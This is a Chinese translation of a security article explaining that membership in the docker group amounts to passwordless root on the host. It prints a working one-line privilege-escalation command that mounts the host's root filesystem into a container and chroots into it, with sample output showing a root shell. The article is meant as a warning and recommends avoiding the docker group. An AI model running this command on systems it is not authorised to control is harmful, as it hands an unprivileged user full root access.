本文翻译自 Privilege Escalation via Docker，目的在于提醒大家注意安全性。本文中所有的内容总结成一句话：某个用户被加入了 docker 用户组，那么这个用户相当于直接获得了宿主机免认证的 root 权限。

文章太长不要看，一句话，不要用 docker 用户组。

如果你对 Docker 不熟悉的话，简单来说，Docker 是一个轻量级的应用容器。和常见的虚拟机类似，但是和虚拟机相比，资源消耗更低。并且，使用和 GitHub 类似的被 commit 的容器，非常容易就能实现容器内指定运行环境中的应用打包和部署。

问题

如果你有服务器上一个普通用户的账号，如果这个用户被加入了 docker 用户组，那么你很容易就能获得宿主机的 root 权限。

黑魔法：

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

输出如下：

johndoe@testmachine:~$ docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
[...]
You should now have a root shell on the host OS
Press Ctrl-D to exit the docker instance / shell
# whoami
root #此处是容器内部，但是容器已经 chroot /hostOS，所以相当于直接获取了宿主机的 root 权限。
#

译者一直以为是 Ctrl-D 之后，宿主机的 shell 变成 root，实际上不是。
咨询了作者 Chris Foster 得知，是在容器内获得宿主机的 root 权限。
是不是想起了以前译者在 Docker 安全 中提到的容器内部的 UID=0 对容器外部某个不明程序执行了 chmod +s？

解释

当然，所有的解释汇成一句话，应该就是：docker 组内用户执行命令的时候会自动在所有命令前添加 sudo。因为设计或者其他的原因，Docker 给予所有 docker 组的用户相当大的权力（虽然权力只体现在能访问 /var/run/docker.sock 上面）。

默认情况下，Docker 软件包是会默认添加一个 docker 用户组的。Docker 守护进程会允许 root 用户和 docker 组用户访问 Docker。给用户提供 Docker 权限和给用户无需认证便可以随便获取的 root 权限差别不大。

解决方案

对于 Docker 来说可能很难修复，因为涉及到他们的架构问题，所以需要重写非常多的关键代码才能避免这个问题。我个人的建议是不要使用 docker 用户组。当然，Docker 官方文档中最好也很清楚地写明这一点。不要让新人不懂得“和 root 权限差别不大”是什么意思。

Docker 官方也意识到了这个问题，尽管他们并没有很明显地表明想去修复它。在他们的安全文档中，他们也的确表示 docker 用户组的权限和 root 权限差别不大，并且敬告用户慎重使用。

漏洞详情

上面那条命令 docker run -v /:/hostOS -i -t chrisfosterelli/rootplease，主要的作用是：从 Docker Hub 上面下载我的镜像，然后运行。参数 -v 将容器外部的目录 / 挂载到容器内部 /hostOS，并且使用 -i 和 -t 参数进入容器的 shell。

这个容器的启动脚本是 exploit.sh，主要内容是：chroot 到容器的 /hostOS （也就是宿主机的 /），然后获取到宿主机的 root 权限。

当然可以从这个衍生出非常多的提权方法，但是这个方法是最直接的。

本文中所提到的代码托管在 Github，镜像在 Docker Hub。